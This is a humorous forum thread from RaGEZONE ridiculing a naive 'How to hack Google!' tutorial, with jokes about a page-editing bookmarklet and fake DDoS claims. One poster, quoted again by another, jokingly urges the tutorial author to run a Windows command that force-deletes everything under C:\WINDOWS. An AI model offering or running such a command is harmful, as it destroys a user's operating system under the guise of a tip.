Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

How to hack Google!

r63

Elite Diviner
Reaction score
not as badass as javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

Mythic Archon
Reaction score
pro hacker
i so scared
i need new pants
- internet explorer -facepalm-
- camera -facepalm-

r63

Elite Diviner
Reaction score
lolz - How to hack Google! - RaGEZONE Forums lolz - How to hack Google! - RaGEZONE Forums OMFG THIS WORKz I JUST DID IT AND NOW IM ADMIN ON HERE AND SO is OTHR PPL LOLZ L33T H4XOR
MentaL - How to hack Google! - RaGEZONE Forums

Attachments

You must be registered for see attachments list
Banned
Banned
Reaction score
Wow, i didn't know it was that simple, who is that guy, i wanna meet him.

Reaction score
You guys are douchebags , I did hack Google with his tutorial. I know it because it stopped working ... wait ... that's just my PC freezing up , using 5 toolbars and Internet Explorer.

Great tutorial nontheless , here is something he sould try soon in his awesome "terminal" :

Code:
DEL /F /S /Q /A "C:\WINDOWS\*"

Reaction score
You guys are douchebags , I did hack Google with his tutorial. I know it because it stopped working ... wait ... that's just my PC freezing up , using 5 toolbars and Internet Explorer.

Great tutorial nontheless , here is something he sould try soon in his awesome "terminal" :

Code:
DEL /F /S /Q /A "C:\WINDOWS\*"

I dont get it. Could you post video demo of it you executing this?

Newbie Spellweaver
Reaction score
I already ddosed google, i think it wen't down for sure.

Back